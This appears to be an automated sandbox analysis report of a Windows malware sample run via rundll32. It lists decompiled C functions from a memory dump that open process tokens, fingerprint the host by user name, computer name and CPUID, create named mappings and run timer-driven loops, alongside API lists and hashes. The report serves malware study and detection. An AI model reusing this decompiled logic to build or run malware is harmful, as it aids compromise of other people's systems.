                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 23fd5e8abd309a8cdcde2f801fdb08808862b22a960cb19ebde37189e7e2fdf7
                                • Instruction ID: ab4c49a4481d3796b96f717ea724454c0dc5f14072da3f521eda9865c6a908aa
                                • Opcode Fuzzy Hash: 23fd5e8abd309a8cdcde2f801fdb08808862b22a960cb19ebde37189e7e2fdf7
                                • Instruction Fuzzy Hash: 12E092B39012617787115BE6AC48C9FBBACEF8D651308045AFA10D3200CB38DC15CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 996 Parent PID: 4632 rundll32.exeCOMMON

                                Executed Functions

                                Function 052F2D06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E052F2D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E052F6837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E052F50CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x052f2d13
                                0x052f2d14
                                0x052f2d15
                                0x052f2d16
                                0x052f2d17
                                0x052f2d1b
                                0x052f2d22
                                0x052f2d31
                                0x052f2d34
                                0x052f2d37
                                0x052f2d3e
                                0x052f2d41
                                0x052f2d44
                                0x052f2d47
                                0x052f2d4a
                                0x052f2d55
                                0x052f2d57
                                0x052f2d60
                                0x052f2d68
                                0x052f2d6a
                                0x052f2d7c
                                0x052f2d86
                                0x052f2d8a
                                0x052f2d99
                                0x052f2d9d
                                0x052f2da6
                                0x052f2dae
                                0x052f2dae
                                0x052f2db0
                                0x052f2db0
                                0x052f2db8
                                0x052f2dbe
                                0x052f2dc2
                                0x052f2dc2
                                0x052f2dcd

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 052F2D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 052F2D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 052F2D7C
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 052F2D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 052F2DA6
                                • NtClose.NTDLL(00000000), ref: 052F2DB8
                                • NtClose.NTDLL(00000000), ref: 052F2DC2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: cb734ddf31eb59ceee975ad8ca0a4854c9af6bbbad0c78ed93d93875210690e2
                                • Instruction ID: b437b5945e3d2a2b269b383de4227f587308c59217ce55970e774d7e1286b45f
                                • Opcode Fuzzy Hash: cb734ddf31eb59ceee975ad8ca0a4854c9af6bbbad0c78ed93d93875210690e2
                                • Instruction Fuzzy Hash: 782105B2A10218BBDF01AF94EC49EDEBFBDEF08750F104066FA05E6150D7719A449BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F2022, Relevance: 16.6, APIs: 11, Instructions: 149timememoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 83%
                                			E052F2022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x52fa298);
					_v20 = 0;
					_v16 = 0;
					L052F7D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x52fa2c4; // 0x30c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x52fa2a4 = 5;
						} else {
							_t69 = E052F1AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x52fa2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E052F5F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E052F3032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x52fa29c);
							goto L21;
						} else {
							__eflags =  *0x52fa2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E052F1492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x52fa2a0);
								L21:
								L052F7D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x52fa290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                0x052f2022
                                0x052f2034
                                0x052f2037
                                0x052f2043
                                0x052f204b
                                0x052f204e
                                0x052f21b4
                                0x052f2054
                                0x052f2054
                                0x052f2056
                                0x052f205b
                                0x052f205c
                                0x052f2062
                                0x052f2065
                                0x052f2068
                                0x052f2076
                                0x052f2081
                                0x052f2084
                                0x052f2086
                                0x052f2093
                                0x052f209d
                                0x052f20a1
                                0x052f20a4
                                0x052f20a9
                                0x052f20b4
                                0x052f20b4
                                0x052f20ab
                                0x052f20ab
                                0x052f20b2
                                0x00000000
                                0x00000000
                                0x052f20b2
                                0x052f20be
                                0x00000000
                                0x052f20c1
                                0x052f20c5
                                0x052f20d0
                                0x052f20d0
                                0x052f20d7
                                0x052f20dc
                                0x052f20e3
                                0x052f20ec
                                0x052f20f2
                                0x052f20f5
                                0x052f20fc
                                0x052f20ff
                                0x00000000
                                0x00000000
                                0x052f2101
                                0x052f2104
                                0x052f2107
                                0x052f210a
                                0x00000000
                                0x052f210c
                                0x052f211b
                                0x052f211b
                                0x00000000
                                0x052f2149
                                0x052f2149
                                0x052f214e
                                0x052f216d
                                0x052f216f
                                0x052f2174
                                0x052f2175
                                0x00000000
                                0x052f2150
                                0x052f2150
                                0x052f2156
                                0x00000000
                                0x052f2158
                                0x052f2158
                                0x052f215d
                                0x052f215f
                                0x052f2164
                                0x052f2165
                                0x052f217b
                                0x052f217b
                                0x052f2183
                                0x052f218e
                                0x052f2191
                                0x052f219c
                                0x052f219e
                                0x052f21a0
                                0x052f21a3
                                0x00000000
                                0x052f21a9
                                0x00000000
                                0x052f21a9
                                0x052f21a3
                                0x052f2156
                                0x00000000
                                0x052f214e
                                0x052f211e
                                0x052f2120
                                0x052f2123
                                0x052f2124
                                0x052f2124
                                0x052f2128
                                0x052f2132
                                0x052f2132
                                0x052f2138
                                0x052f213b
                                0x052f213b
                                0x052f2141
                                0x052f2141
                                0x052f21be
                                0x00000000

                                APIs
                                • memset.NTDLL ref: 052F2037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 052F2043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 052F2068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 052F2084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052F209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F2132
                                • CloseHandle.KERNEL32(?), ref: 052F2141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 052F217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,052F560C), ref: 052F2191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 052F219C
                                  • Part of subcall function 052F1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,07459340,?,00000000,30314549,00000014,004F0053,074592FC), ref: 052F1BA4
                                  • Part of subcall function 052F1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052F20B0), ref: 052F1BB6
                                • GetLastError.KERNEL32 ref: 052F21AE
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 57e7dc89629ace93390378df82c8da594037536997153f6aa84a8b71c57e600f
                                • Instruction ID: e18f907ab2acbe3c8bf28b03f8c7673f2ce5af0cfdc7e6c5b668bf4f5e592f26
                                • Opcode Fuzzy Hash: 57e7dc89629ace93390378df82c8da594037536997153f6aa84a8b71c57e600f
                                • Instruction Fuzzy Hash: 18513C75925229EADF10DF94FC49DEEBFB9FF05760F10412AF619A2190DB718680CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F6384, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E052F6384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L052F7D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x52fa2d4; // 0x215d5a8
				_t5 = _t13 + 0x52fb8a2; // 0x7458e4a
				_t6 = _t13 + 0x52fb57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L052F7A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x52fa2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x052f6384
                                0x052f638c
                                0x052f6390
                                0x052f6396
                                0x052f639b
                                0x052f63a0
                                0x052f63a3
                                0x052f63a6
                                0x052f63ab
                                0x052f63ac
                                0x052f63af
                                0x052f63b4
                                0x052f63bb
                                0x052f63c5
                                0x052f63c7
                                0x052f63c8
                                0x052f63cb
                                0x052f63e7
                                0x052f63ed
                                0x052f63f1
                                0x052f643f
                                0x052f63f3
                                0x052f6400
                                0x052f6410
                                0x052f6418
                                0x052f642a
                                0x052f642e
                                0x00000000
                                0x00000000
                                0x052f641a
                                0x052f641d
                                0x052f6422
                                0x052f6424
                                0x052f6424
                                0x052f6402
                                0x052f6404
                                0x052f6430
                                0x052f6431
                                0x052f6431
                                0x052f6400
                                0x052f6446

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,052F5488,?,00000001,?), ref: 052F6390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 052F63A6
                                • _snwprintf.NTDLL ref: 052F63CB
                                • CreateFileMappingW.KERNELBASE(000000FF,052FA2F8,00000004,00000000,00001000,?), ref: 052F63E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488,?), ref: 052F63F9
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 052F6410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488), ref: 052F6431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,052F5488,?), ref: 052F6439
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 65857a13ef2f27c024d81ff8f3f9b9f4d20e877e18d888618b3c993e2103d8eb
                                • Instruction ID: 82e272299a9d30fea85616532e78d7d57d1257900281908517ee065b32ab69b8
                                • Opcode Fuzzy Hash: 65857a13ef2f27c024d81ff8f3f9b9f4d20e877e18d888618b3c993e2103d8eb
                                • Instruction Fuzzy Hash: 4F219672650214BBD721AB64FC0AF9DBBB9EF44750F244135FA06E72C0DB70A5418B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F4454, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E052F4454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x52fa2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E052F143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x52fa2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x52fa290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E052F283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x52fa290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x52fa290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E052F283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x52fa290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                0x052f4454
                                0x052f445c
                                0x052f4462
                                0x052f4465
                                0x052f4468
                                0x052f446a
                                0x052f446f
                                0x052f446f
                                0x052f4475
                                0x052f4477
                                0x052f4484
                                0x052f44e5
                                0x052f4486
                                0x052f448b
                                0x052f4491
                                0x052f4496
                                0x052f44a4
                                0x052f44a8
                                0x052f44b7
                                0x052f44be
                                0x052f44c5
                                0x052f44c5
                                0x052f44d0
                                0x052f44d0
                                0x052f44a8
                                0x052f4496
                                0x052f44e7
                                0x052f44ed
                                0x052f44f7
                                0x052f44f9
                                0x052f44fe
                                0x052f450d
                                0x052f4511
                                0x052f451c
                                0x052f4523
                                0x052f452a
                                0x052f452a
                                0x052f4536
                                0x052f4536
                                0x052f4511
                                0x052f453f
                                0x052f4541
                                0x052f4544
                                0x052f4546
                                0x052f4549
                                0x052f454c
                                0x052f4556
                                0x052f455a
                                0x052f455e

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F448B
                                • RtlAllocateHeap.NTDLL(00000000,052F55CE), ref: 052F44A2
                                • GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F44AF
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,052F55CE,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F44D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F44F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052F450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F4518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F4536
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID:
                                • API String ID: 3239747167-0
                                • Opcode ID: 2434074f989eb7543e27bf7301f2502a06a5b1192155e8dcaa7214b390988e0a
                                • Instruction ID: a23cfddd26d38c5b75454a3160a7294b86107f11ad8825ae49f04720344ad0c2
                                • Opcode Fuzzy Hash: 2434074f989eb7543e27bf7301f2502a06a5b1192155e8dcaa7214b390988e0a
                                • Instruction Fuzzy Hash: 6931097162420AAFDB11EFA9F985B6EFBF9FF48210F104439E609D2250EB71DA409B50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 052F53F2, Relevance: 10.7, APIs: 7, Instructions: 191memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E052F53F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E052F58F8();
				if(_t27 != 0) {
					_t77 =  *0x52fa2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x52fa2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x52fa148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E052F696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x52fa2d4; // 0x215d5a8
					_push(0x52fa2fc);
					_push(1);
					_t7 = _t32 + 0x52fb5ad; // 0x4d283a53
					 *0x52fa2f8 = 0xc;
					 *0x52fa300 = 0;
					L052F4AF8();
					_t36 = E052F6384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E052F4454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E052F6837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x52fa2d4; // 0x215d5a8
								_t18 = _t64 + 0x52fb84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x52fa32c = _t87;
						}
						_t38 = E052F60E1();
						 *0x52fa2c8 =  *0x52fa2c8 ^ 0xe8fa7dd7;
						 *0x52fa31c = _t38;
						_t39 = E052F6837(0x60);
						__eflags = _t39;
						 *0x52fa37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x52fa37c; // 0x7459630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x52fa37c; // 0x7459630
							 *_t56 = 0x52fb83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x52fa290, _t84, 0x43);
							__eflags = _t42;
							 *0x52fa314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x52fa2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x52fa2d4; // 0x215d5a8
								_t19 = _t76 + 0x52fb53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x52f92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E052F4454( ~_v8 &  *0x52fa2c8, 0x52fa00c); // executed
								_t84 = E052F2206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E052F1376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E052F2022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E052F2439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x52fa14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E052F6BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}






































                                0x052f53f2
                                0x052f53fd
                                0x052f5400
                                0x052f5403
                                0x052f5406
                                0x052f540d
                                0x052f540f
                                0x052f541b
                                0x052f541d
                                0x052f541d
                                0x052f5426
                                0x052f542e
                                0x052f5431
                                0x052f544b
                                0x052f5450
                                0x052f5451
                                0x052f5453
                                0x052f5458
                                0x052f545d
                                0x052f545f
                                0x052f5466
                                0x052f5470
                                0x052f5476
                                0x052f5483
                                0x052f548a
                                0x052f548f
                                0x052f548f
                                0x052f5498
                                0x052f54c1
                                0x052f54c4
                                0x052f54d1
                                0x052f54d8
                                0x052f54e4
                                0x052f54e6
                                0x052f54e8
                                0x052f54ed
                                0x052f54f3
                                0x052f54f9
                                0x052f54ff
                                0x052f5502
                                0x052f5507
                                0x052f550f
                                0x052f5511
                                0x052f5511
                                0x052f5514
                                0x052f5514
                                0x052f551a
                                0x052f551f
                                0x052f5527
                                0x052f552c
                                0x052f5531
                                0x052f5533
                                0x052f5538
                                0x052f5567
                                0x052f553a
                                0x052f553f
                                0x052f5544
                                0x052f5549
                                0x052f5550
                                0x052f5556
                                0x052f555b
                                0x052f5561
                                0x052f5561
                                0x052f5568
                                0x052f556a
                                0x052f5579
                                0x052f557f
                                0x052f5581
                                0x052f5586
                                0x052f55b2
                                0x052f5588
                                0x052f5588
                                0x052f558e
                                0x052f559b
                                0x052f55a1
                                0x052f55a1
                                0x052f55a9
                                0x052f55ab
                                0x052f55b3
                                0x052f55b5
                                0x052f55bc
                                0x052f55c9
                                0x052f55d3
                                0x052f55d5
                                0x052f55d7
                                0x00000000
                                0x00000000
                                0x052f55d9
                                0x052f55de
                                0x052f55e0
                                0x052f55e7
                                0x052f55eb
                                0x052f55ee
                                0x052f5603
                                0x052f5607
                                0x052f560c
                                0x00000000
                                0x052f560c
                                0x052f55f0
                                0x052f55f2
                                0x00000000
                                0x00000000
                                0x052f55f4
                                0x052f55fd
                                0x052f55ff
                                0x052f5601
                                0x00000000
                                0x00000000
                                0x00000000
                                0x052f5601
                                0x052f55e4
                                0x052f55e4
                                0x052f55b5
                                0x052f549a
                                0x052f549a
                                0x052f549f
                                0x052f560e
                                0x052f5612
                                0x052f561a
                                0x052f561a
                                0x00000000
                                0x052f5612
                                0x052f54a5
                                0x052f54a8
                                0x052f54a8
                                0x052f54aa
                                0x052f54ad
                                0x052f54b5
                                0x052f54bc
                                0x00000000
                                0x052f5622
                                0x052f5622
                                0x052f5625
                                0x052f562a
                                0x052f562a

                                APIs
                                  • Part of subcall function 052F58F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,052F540B,00000000,00000000,00000000,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F5907
                                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,052FA2FC,00000000), ref: 052F5476
                                • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F548F
                                • wsprintfA.USER32 ref: 052F550F
                                • memset.NTDLL ref: 052F553F
                                • RtlInitializeCriticalSection.NTDLL(074595F0), ref: 052F5550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 052F5579
                                • wsprintfA.USER32 ref: 052F55A9
                                  • Part of subcall function 052F4454: GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F448B
                                  • Part of subcall function 052F4454: RtlAllocateHeap.NTDLL(00000000,052F55CE), ref: 052F44A2
                                  • Part of subcall function 052F4454: GetUserNameW.ADVAPI32(00000000,052F55CE), ref: 052F44AF
                                  • Part of subcall function 052F4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,052F55CE,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F44D0
                                  • Part of subcall function 052F4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 052F44F7
                                  • Part of subcall function 052F4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 052F450B
